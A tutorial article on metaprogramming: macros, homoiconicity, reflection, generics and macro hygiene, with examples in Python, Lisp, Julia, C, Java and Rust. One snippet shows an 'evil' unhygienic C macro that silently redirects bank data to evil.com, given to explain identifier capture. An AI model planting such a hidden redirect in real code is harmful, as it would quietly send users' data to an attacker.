Writing Code: An Introduction to Modern Metaprogramming Theory and Practice

Thinking about the optimal way to explain macros always takes me back to my early programming days and a Python program I wrote. The program’s organization was far from ideal; I had to invoke numerous functions with minor differences, leading to cumbersome code. Back then, I was unknowingly yearning for metaprogramming.

metaprogramming (noun)

Any technique by which a program can treat code as data.

Let’s envision building the back end for a pet owner app using the pet_sdk library. We’ll illustrate the same challenges encountered in my Python project. Our initial Python code helps pet owners buy cat food:

import pet_sdk

cats = pet_sdk.get_cats()
print(f"Found {len(cats)} cats!")
for cat in cats:
    pet_sdk.order_cat_food(cat, amount=cat.food_needed)
Snippet 1: Order Cat Food

With the code confirmed working, we replicate the logic for bird and dog owners, incorporating vet appointment booking:

# An SDK that can give us information about pets - unfortunately, the functions are slightly different for each pet
import pet_sdk

# Get all of the birds, cats, and dogs in the system, respectively
birds = pet_sdk.get_birds()
cats = pet_sdk.get_cats()
dogs = pet_sdk.get_dogs()

for cat in cats:
    print(f"Checking information for cat {cat.name}")

    if cat.hungry():
        pet_sdk.order_cat_food(cat, amount=cat.food_needed)
    
    cat.clean_litterbox()

    if cat.sick():
        available_vets = pet_sdk.find_vets(animal="cat")
        if len(available_vets) > 0:
            vet = available_vets[0]
            vet.book_cat_appointment(cat)

for dog in dogs:
    print(f"Checking information for dog {dog.name}")

    if dog.hungry():
        pet_sdk.order_dog_food(dog, amount=dog.food_needed)
    
    dog.walk()

    if dog.sick():
        available_vets = pet_sdk.find_vets(animal="dog")
        if len(available_vets) > 0:
            vet = available_vets[0]
            vet.book_dog_appointment(dog)

for bird in birds:
    print(f"Checking information for bird {bird.name}")

    if bird.hungry():
        pet_sdk.order_bird_food(bird, amount=bird.food_needed)
    
    bird.clean_cage()

    if bird.sick():
        available_vets = pet_sdk.find_vets(animal="bird")
        if len(available_vets) > 0:
            vet = available_vets[0]
            vet.book_bird_appointment(bird)
Snippet 2: Order Cat, Dog, and Bird Food; Book Vet Appointment

Condensing Snippet 2’s repetitive logic into a loop seems efficient. However, the distinct function names (book_bird_appointment, book_cat_appointment, etc.) leave no obvious way to pick the correct function call within the loop:

import pet_sdk

all_animals = pet_sdk.get_birds() + pet_sdk.get_cats() + pet_sdk.get_dogs()

for animal in all_animals:
    pass  # What now?
Snippet 3: What Now?

Imagine an enhanced Python version where we could craft programs capable of automatically generating our desired final code. Picture effortlessly and flexibly manipulating our program as if it were data in a file, a list, or any other typical data type or input:

import pet_sdk

for animal in ["cat", "dog", "bird"]:
    pets = pet_sdk.get_{animal}s()  # When animal is "cat", this
                                    # would be pet_sdk.get_cats()

    for pet in pets:
        pet_sdk.order_{animal}_food(pet, amount=pet.food_needed)
        # When animal is "dog", this would be
        # pet_sdk.order_dog_food(pet, amount=pet.food_needed)
Snippet 4: TurboPython: An Imaginary Program

This exemplifies a macro, a feature found in languages like Rust, Julia, and C, but absent in Python.

This scenario perfectly highlights the potential of writing programs that can modify and manipulate their own code. This is the essence of macros, representing one answer to a broader question: How can we empower a program to analyze its code as data and act upon that analysis?

Techniques enabling such introspection collectively fall under “metaprogramming.” This rich subfield in programming language design traces back to the powerful concept of “code as data.”
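
Python has no macros, but its standard ast module gives a feel for what “code as data” means in practice. The following is only a minimal sketch (it assumes Python 3.9 or later for ast.unparse, and the names variable_names and AddToMul are made up for this illustration): it parses source text into a tree, inspects that tree like any other data structure, rewrites it, and runs the result.

```python
import ast

source = "total = price + tax"

# Parse the source text into a tree of ordinary Python objects.
tree = ast.parse(source)


def variable_names(node):
    """Collect every variable name mentioned anywhere in the tree."""
    return sorted({n.id for n in ast.walk(node) if isinstance(n, ast.Name)})


class AddToMul(ast.NodeTransformer):
    """Rewrite every `a + b` in the tree into `a * b`."""

    def visit_BinOp(self, node):
        self.generic_visit(node)  # rewrite nested expressions first
        if isinstance(node.op, ast.Add):
            node.op = ast.Mult()
        return node


print(variable_names(tree))

# Transform the tree, then turn it back into source text and run it.
rewritten = ast.fix_missing_locations(AddToMul().visit(tree))
print(ast.unparse(rewritten))

namespace = {"price": 10, "tax": 2}
exec(compile(rewritten, "<generated>", "exec"), namespace)
print(namespace["total"])
```

This is far clumsier than a real macro system, which is the point of the comparison: the program can read and change its own code, but only through a separate library rather than through the language’s syntax.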

Reflection: Python’s Redemption

You might argue that while Python lacks macro support, it offers alternative ways to achieve the desired code. For instance, using the built-in isinstance() function, we can identify the class of our animal variable and call the corresponding function:

# An SDK that can give us information about pets - unfortunately, the functions
# are slightly different

import pet_sdk

def process_animal(animal):
    if isinstance(animal, pet_sdk.Cat):
        animal_name_type = "cat"
        order_food_fn = pet_sdk.order_cat_food
        care_fn = animal.clean_litterbox 
    elif isinstance(animal, pet_sdk.Dog):
        animal_name_type = "dog"
        order_food_fn = pet_sdk.order_dog_food
        care_fn = animal.walk
    elif isinstance(animal, pet_sdk.Bird):
        animal_name_type = "bird"
        order_food_fn = pet_sdk.order_bird_food
        care_fn = animal.clean_cage
    else:
        raise TypeError("Unrecognized animal!")
    
    print(f"Checking information for {animal_name_type} {animal.name}")
    if animal.hungry():
        order_food_fn(animal, amount=animal.food_needed)
    
    care_fn()

    if animal.sick():
        available_vets = pet_sdk.find_vets(animal=animal_name_type)
        if len(available_vets) > 0:
            vet = available_vets[0]
            # We still have to check again what type of animal it is
            if isinstance(animal, pet_sdk.Cat):
                vet.book_cat_appointment(animal)
            elif isinstance(animal, pet_sdk.Dog):
                vet.book_dog_appointment(animal)
            else:
                vet.book_bird_appointment(animal)


all_animals = pet_sdk.get_birds() + pet_sdk.get_cats() + pet_sdk.get_dogs()
for animal in all_animals:
    process_animal(animal)
Snippet 5: An Idiomatic Example

This type of metaprogramming, known as reflection, will be revisited later. While still somewhat cumbersome, Snippet 5’s code is more manageable than the repetitive logic in Snippet 2.

Challenge

Using the built-in getattr function, modify the preceding code to call the appropriate order_*_food and book_*_appointment functions dynamically. This arguably makes the code less readable, but if you know Python well, it’s worth thinking about how you might use getattr instead of isinstance to simplify the code.
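
As a starting point for the challenge, here is one possible shape for the food-ordering half. It is a sketch under assumptions, not the definitive answer: pet_sdk is replaced by a small stand-in that only records calls, and Pet, Cat, Dog, and order_food are hypothetical names introduced so that the example runs on its own.

```python
from types import SimpleNamespace

calls = []  # records what the stand-in SDK was asked to do


def _recorder(name):
    """Build a fake SDK function that logs its own name and arguments."""
    def fake(pet, **kwargs):
        calls.append((name, pet.name, kwargs))
    return fake


# Hypothetical stand-in for pet_sdk, not the real library.
pet_sdk = SimpleNamespace(
    order_cat_food=_recorder("order_cat_food"),
    order_dog_food=_recorder("order_dog_food"),
)


class Pet:
    def __init__(self, name, food_needed):
        self.name = name
        self.food_needed = food_needed


class Cat(Pet):
    pass


class Dog(Pet):
    pass


def order_food(animal):
    """Look up order_<kind>_food by name instead of branching on the type."""
    kind = type(animal).__name__.lower()  # Cat -> "cat"
    order_fn = getattr(pet_sdk, f"order_{kind}_food", None)
    if order_fn is None:
        raise TypeError(f"Unrecognized animal: {kind}")
    order_fn(animal, amount=animal.food_needed)


for pet in [Cat("Tom", 2), Dog("Rex", 5)]:
    order_food(pet)

print(calls)
```

Booking appointments could follow the same pattern with getattr(vet, f"book_{kind}_appointment"). The trade-off is that a typo in a function name now surfaces only at run time.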


Homoiconicity: The Lisp Legacy

Languages like Lisp elevate metaprogramming through homoiconicity.

homoiconicity (noun)

The property of a programming language whereby there is no distinction between code and the data on which a program is operating.

Created in 1958, Lisp, short for “LISt Processor,” is the oldest homoiconic language and the second-oldest high-level programming language still in widespread use. Its influence on computing and programming has been profound.

“Emacs is written in Lisp, which is the only computer language that is beautiful.” - Neal Stephenson

Emerging just a year after FORTRAN, in the era of punch cards and room-sized computers, Lisp remains actively used for modern applications today. Its primary creator, John McCarthy, a pioneer in AI, championed its use in the field for many years. Researchers valued its ability to dynamically modify code. While AI research now centers around neural networks and complex statistical models, Lisp’s impact, particularly from the ’60s and ’70s research at MIT and Stanford, shaped the field and continues to resonate.

Lisp introduced early programmers to powerful concepts like recursion, higher-order functions, and linked lists, showcasing the power of a language built on lambda calculus.

These concepts led to an explosion in programming language design, with Edsger Dijkstra famously noting that Lisp “[…] assisted a number of our most gifted fellow humans in thinking previously impossible thoughts.”

Here’s a simple Lisp program (and its Python equivalent) defining a recursive “factorial” function and calling it with input “7”:

Lisp:

(defun factorial (n)
  (if (= n 1)
      1
      (* n (factorial (- n 1)))))

(print (factorial 7))

Python:

def factorial(n):
    if n == 1:
        return 1
    else:
        return n * factorial(n-1)

print(factorial(7))

Code as Data

While Lisp popularized recursion and other concepts, homoiconicity, despite its impact, didn’t permeate most modern languages.

The table below contrasts homoiconic functions returning code in Julia and Lisp. Julia, a homoiconic language, shares similarities with languages like Python and Ruby.

The crucial element is the quoting character. Julia utilizes a : (colon), while Lisp uses a ' (single quote):

Julia:

function function_that_returns_code()
    return :(x + 1)
end

Lisp:

(defun function_that_returns_code ()
    '(+ x 1))

The quote adjacent to the main expression ((x + 1) or (+ x 1)) transforms it from directly evaluated code into an abstract expression we can manipulate. The function returns code, not a string or a computed value. Calling print(function_that_returns_code()) in Julia would print the code as text: x + 1 (similarly in Lisp). Omitting the : (or ' in Lisp) would result in an error, as x would be undefined.

Let’s expand our Julia example:

function function_that_returns_code(n)
    return :(x + $n)
end

my_code = function_that_returns_code(3)
print(my_code) # Prints out x + 3

x = 1
print(eval(my_code)) # Prints out 4
x = 3
print(eval(my_code)) # Prints out 6
Snippet 6: Julia Example Extended

The eval function executes code generated elsewhere in the program. The printed value depends on the x variable’s definition. Attempting to eval the generated code without defining x would cause an error.
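
For readers more at home in Python, the same quote-then-eval flow can be approximated with the ast module. This is only a rough analogue and assumes Python 3.9 or later; expression_that_adds and PLACEHOLDER are names invented for this sketch. Python has no quoting syntax, so the expression is built by parsing a string and splicing a value into the resulting tree.

```python
import ast


def expression_that_adds(n):
    """Return the expression `x + n` as a syntax tree, not as a value."""
    tree = ast.parse("x + PLACEHOLDER", mode="eval")
    # Splice the concrete value in, much like $n in the Julia snippet.
    tree.body.right = ast.Constant(value=n)
    return ast.fix_missing_locations(tree)


my_code = expression_that_adds(3)
print(ast.unparse(my_code))  # x + 3

# The tree only becomes a number once it is evaluated with some x.
compiled = compile(my_code, "<generated>", "eval")
print(eval(compiled, {"x": 1}))  # 4
print(eval(compiled, {"x": 3}))  # 6
```

As in the Julia version, evaluating the expression in a namespace that does not define x raises an error (a NameError in Python).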

Homoiconicity, a powerful metaprogramming form, enables paradigms where programs adapt dynamically, generating code for specific problems or new data formats.

Consider WolframAlpha, where the homoiconic Wolfram Language generates code to tackle a vast array of problems. Ask “What’s the GDP of New York City divided by the population of Andorra?”, and you receive a logical answer.

It’s unlikely this obscure calculation resides in a database. Wolfram leverages metaprogramming and an ontological knowledge graph to dynamically generate code for the answer.

Understanding the flexibility and power of Lisp and other homoiconic languages is crucial. Before delving further, let’s review available metaprogramming options:

Homoiconicity
Definition: A language characteristic in which code is “first-class” data. Since there is no separation between code and data, the two can be used interchangeably.
Examples:
  • Lisp
  • Prolog
  • Julia
  • Rebol/Red
  • Wolfram Language
Notes: Here, Lisp includes other languages in the Lisp family, like Scheme, Racket, and Clojure.

Macros
Definition: A statement, function, or expression that takes code as input and returns code as output.
Examples:
  • Rust’s macro_rules!, derive, and procedural macros
  • Julia’s @macro invocations
  • Lisp’s defmacro
  • C’s #define
Notes: (See the next note about C’s macros.)

Preprocessor Directives (or Precompiler)
Definition: A system that takes a program as input and, based on statements included in the code, returns a changed version of the program as output.
Examples:
  • C’s macros
  • C++’s # preprocessor system
Notes: C’s macros are implemented using C’s preprocessor system, but the two are separate concepts. The key conceptual difference between C’s macros (in which we use the #define preprocessor directive) and other forms of C preprocessor directives (e.g., #if and #ifndef) is that we use the macros to generate code while using other non-#define preprocessor directives to conditionally compile other code. The two are closely related in C and in some other languages, but they’re different types of metaprogramming.

Reflection
Definition: A program’s ability to examine, modify, and introspect its own code.
Examples:
  • Python’s isinstance and getattr functions
  • JavaScript’s Reflect and typeof
  • Java’s getDeclaredMethods
  • .NET’s System.Type class hierarchy
Notes: Reflection can occur at compile time or at run time.

Generics
Definition: The ability to write code that’s valid for a number of different types or that can be used in multiple contexts but stored in one place. We can define the contexts in which the code is valid either explicitly or implicitly.
Examples:
Template-style generics:
  • C++
  • Rust
  • Java
Parametric polymorphism:
  • Haskell
  • ML
Notes: Generic programming is a broader topic than generic metaprogramming, and the line between the two isn’t well defined. In this author’s view, a parametric type system only counts as metaprogramming if it’s in a statically typed language.

A Reference for Metaprogramming

Let’s examine hands-on homoiconicity, macros, preprocessor directives, reflection, and generics examples in various languages:

# Prints out "Hello, Will" and "Hello, Alice" by evaluating the same quoted code twice
say_hi = :(println("Hello, ", name))

name = "Will"
eval(say_hi)

name = "Alice"
eval(say_hi)
Snippet 7: Homoiconicity in Julia

#include <stdio.h>

// windows_only_function() and unix_only_function() are assumed to be
// declared elsewhere for their respective platforms.
int main(void) {
#ifdef _WIN32
    printf("This section will only be compiled for and run on windows!\n");
    windows_only_function();
#elif defined(__unix__)
    printf("This section will only be compiled for and run on unix!\n");
    unix_only_function();
#endif
    printf("This line runs regardless of platform!\n");
    return 0;
}
Snippet 8: Preprocessor Directives in C

from pet_sdk import Cat, Dog, get_pet

pet = get_pet()

if isinstance(pet, Cat):
    pet.clean_litterbox()
elif isinstance(pet, Dog):
    pet.walk()
else:
    print(f"Don't know how to help a pet of type {type(pet)}")
Snippet 9: Reflection in Python

import com.example.coordinates.*;

interface Vehicle {
    public String getName();
    public void move(double xCoord, double yCoord);
}

public class VehicleDriver<T extends Vehicle> {
    // This class is valid for any other class T which implements
    // the Vehicle interface
    private final T vehicle;

    public VehicleDriver(T vehicle) {
        System.out.println("VehicleDriver: " + vehicle.getName());
        this.vehicle = vehicle;
    }

    public void goHome() {
        this.vehicle.move(HOME_X, HOME_Y);
    }

    public void goToStore() {
        this.vehicle.move(STORE_X, STORE_Y);
    }
    
}
Snippet 10: Generics in Java

macro_rules! print_and_return_if_true {
    ($val_to_check:ident, $val_to_return:expr) => {
        if $val_to_check {
            println!("Val was true, returning {}", $val_to_return);
            return $val_to_return;
        }
    };
}

// The following is the same as if, for each of x, z, and y,
// we wrote if x { println!(...); return ...; }
fn example(x: bool, y: bool, z: bool) -> i32 {
    print_and_return_if_true!(x, 1);
    print_and_return_if_true!(z, 2);
    print_and_return_if_true!(y, 3);
    0 // Fallback so the function still returns an i32 when none were true
}
Snippet 11: Macros in Rust

Macros, like the one in Snippet 11, are regaining popularity in newer languages. A key consideration for their development is hygiene.

Hygienic and Unhygienic Macros

What constitutes “hygienic” or “unhygienic” code? Let’s examine a Rust macro defined with macro_rules!. As the name suggests, macro_rules! generates code based on rules we define. Our macro, named my_macro, follows the rule: “Create the code line let x = $n”, where $n is the input expression:

macro_rules! my_macro {
    ($n:expr) => {
        let x = $n;
    }
}

fn main() {
    let x = 5;
    my_macro!(3);
    println!("{}", x);
}
Snippet 12: Hygiene in Rust

If expanding the macro simply meant replacing its invocation with the generated text, we would expect:

fn main() {
    let x = 5;
    let x = 3; // This is what my_macro!(3) expanded into
    println!("{}", x);
}
Snippet 13: Our Example, Expanded

Our macro seemingly redefines variable x to 3, suggesting the program should print 3. However, it prints 5! Rust’s macro_rules! is hygienic with respect to identifiers: the x introduced inside the macro is treated as a different identifier from the x in main, so the macro does not “capture” the outer x. Had it been captured, x would equal 3.

hygiene (noun)

A property guaranteeing that a macro’s expansion will not capture identifiers or other states from beyond the macro’s scope. Macros and macro systems that do not provide this property are called unhygienic.
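
Python has no macros, so the difference can only be imitated there, but a small simulation makes the definition concrete. In this sketch every name (gensym, expand_unhygienic, expand_hygienic, run) is invented for illustration: a “macro” is just a function that returns source text, and “expansion” is running that text in the caller’s namespace with exec.

```python
import itertools

_counter = itertools.count()


def gensym(base):
    """Return a fresh name that will not clash with the caller's names."""
    return f"__{base}_{next(_counter)}"


def expand_unhygienic(n):
    # Pastes code that assigns to `x` in whatever scope it lands in.
    return f"x = {n!r}"


def expand_hygienic(n):
    # Renames the macro's own variable so it cannot touch the caller's `x`.
    return f"{gensym('x')} = {n!r}"


def run(expansion):
    """Run the expanded code in a scope that already defines x = 5."""
    scope = {"x": 5}
    exec(expansion, scope)
    return scope["x"]


print(run(expand_unhygienic(3)))  # 3: the caller's x was captured
print(run(expand_hygienic(3)))    # 5: the caller's x is untouched
```

Automatic renaming of this kind is one common way for a macro system to provide hygiene; the sketch does not claim to show how Rust implements it.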

Hygiene in macros sparks debate among developers. Proponents argue that it prevents accidental modification of code behavior. Imagine a complex macro, used in intricate code with numerous variables and identifiers. What if it unknowingly used the same variable as your code?

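Developers often use macros from external libraries without reading the source code, especially in newer languages like Rust and Julia. In a language with unhygienic macros, such as C, a macro they never inspected could do something like this: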

#define EVIL_MACRO website="https://evil.com";

int main() {
    char *website = "https://good.com";
    EVIL_MACRO
    send_all_my_bank_data_to(website);
    return 0;
}
Snippet 14: An Evil C Macro

This unhygienic C macro captures and modifies the website identifier. Identifier capture isn’t inherently malicious; far more often it’s an accidental side effect of macro use.

So, are hygienic macros good and unhygienic ones bad? It’s not that simple. Hygienic macros can be limiting. Revisiting Snippet 2, where pet_sdk serves three pet types, our initial code was:

birds = pet_sdk.get_birds()
cats = pet_sdk.get_cats()
dogs = pet_sdk.get_dogs()

for cat in cats:
    # Cat specific code
for dog in dogs:
    # Dog specific code
# etc…
Snippet 15: Back to the Vet, Recalling pet_sdk

Recall Snippet 3’s attempt to condense this logic into a loop. If our code relied on cats and dogs identifiers, we might want something like:

{animal}s = pet_sdk.get_{animal}s()
for {animal} in {animal}s:
    # {animal} specific code
Snippet 16: Useful Identifier Capture (in Imaginary "TurboPython")

While simplified, imagine needing a macro to generate a significant code portion. Hygienic macros might hinder such cases.

The hygienic versus unhygienic debate is nuanced. In practice, the language you use largely decides whether your macros are hygienic, so keep its rules in mind when writing or using them.

Modern Macros Resurgence

Macros are experiencing a revival. For a long time, mainstream imperative languages shifted away from them, favoring other metaprogramming forms.

Languages like Python and Java, taught in schools, emphasized reflection and generics.

Macros became associated with daunting C/C++ preprocessor syntax, often fading into obscurity.

However, Rust and Julia are changing this. These modern, accessible languages have redefined and popularized macros with fresh ideas. Julia, in particular, shows promise as a versatile language, potentially replacing Python and R.

Revisiting pet_sdk through our “TurboPython” lens, Julia is what we envisioned. Let’s rewrite Snippet 2 using its homoiconicity and other metaprogramming tools:

using pet_sdk

for (pet, care_fn) = (("cat", :clean_litterbox), ("dog", :walk_dog), ("bird", :clean_cage))
    get_pets_fn = Meta.parse("pet_sdk.get_$(pet)s")
    @eval begin
        local animals = $get_pets_fn() #pet_sdk.get_cats(), pet_sdk.get_dogs(), etc.
        for animal in animals
            animal.$care_fn # animal.clean_litterbox(), animal.walk_dog(), etc.
        end
    end
end
Snippet 17: The Power of Julia’s Macros—Making pet_sdk Work for Us

Breaking down Snippet 17:

  1. We iterate over three tuples. For ("cat", :clean_litterbox), pet becomes "cat", and care_fn is assigned the quoted symbol :clean_litterbox.
  2. Meta.parse converts a string into an expression (an Expr object), which can then be evaluated as code. String interpolation builds the name of the function to call, such as pet_sdk.get_cats.
  3. eval runs the generated code. @eval begin ... end is shorthand for calling eval on a quoted block, with $ used to interpolate values such as get_pets_fn and care_fn into that block before it runs.

Julia’s metaprogramming offers expressive freedom. We could’ve used reflection (like Snippet 5’s Python example), written a macro generating code for a specific animal, or even built the entire code as a string and parsed it with Meta.parse.
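
The last option, generating code as text, is the one approach that plain Python can imitate directly, which brings us close to the imaginary TurboPython from Snippet 4. The following is a sketch only: pet_sdk is replaced by a hypothetical stand-in whose functions take simplified arguments, and TEMPLATE, generated, and log are names invented for the example.

```python
from types import SimpleNamespace

log = []  # records which stand-in SDK functions were called

# Hypothetical stand-in for pet_sdk so the sketch runs on its own.
pet_sdk = SimpleNamespace(
    get_cats=lambda: ["Tom"],
    get_dogs=lambda: ["Rex"],
    get_birds=lambda: ["Tweety"],
    order_cat_food=lambda pet: log.append(f"cat food for {pet}"),
    order_dog_food=lambda pet: log.append(f"dog food for {pet}"),
    order_bird_food=lambda pet: log.append(f"bird food for {pet}"),
)

# Source text with holes, filled in once per kind of animal.
TEMPLATE = """
def feed_{kind}s():
    for pet in pet_sdk.get_{kind}s():
        pet_sdk.order_{kind}_food(pet)
"""

generated = {}
for kind in ["cat", "dog", "bird"]:
    # Build the source for one function, then turn it into real code.
    exec(TEMPLATE.format(kind=kind), {"pet_sdk": pet_sdk}, generated)

for feed in generated.values():
    feed()

print(log)
```

Unlike Julia’s expressions, the generated code here is an unstructured string until exec parses it, so mistakes in the template surface only at run time, and exec should never be given text from an untrusted source.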

Beyond Julia: Other Modern Metaprogramming Systems

While compelling, Julia isn’t the sole example of a modern macro system. Rust prominently features macros.

In Rust, macros such as println! and vec! are almost unavoidable in idiomatic code, unlike Julia, where macros are optional.

This centrality led to a thriving macro ecosystem in Rust. Developers have created impressive libraries, proofs of concept, and features, including tools for data serialization/deserialization, automatic SQL generation, and even converting code annotations to other languages – all generated at compile time.

While Julia might be more expressive, Rust exemplifies a modern language embracing metaprogramming as a core aspect.

Looking Ahead

It’s an exciting time for programming languages. We can run C++ applications in web browsers and JavaScript applications on desktops and phones. Barriers to entry are lower, and resources for new programmers are abundant.

This freedom of choice allows us to leverage modern languages that incorporate features and concepts from computer science history. The resurgence of macros in this environment is thrilling. It will be fascinating to witness the innovations of a new generation of developers introduced to macros through Rust and Julia.

Remember, “code as data” is more than a buzzword. It’s a fundamental principle in metaprogramming.

Since Lisp’s debut in 1958, metaprogramming has been crucial to programming’s evolution. While this exploration merely scratches the surface, it highlights the power and potential of modern metaprogramming.

Licensed under CC BY-NC-SA 4.0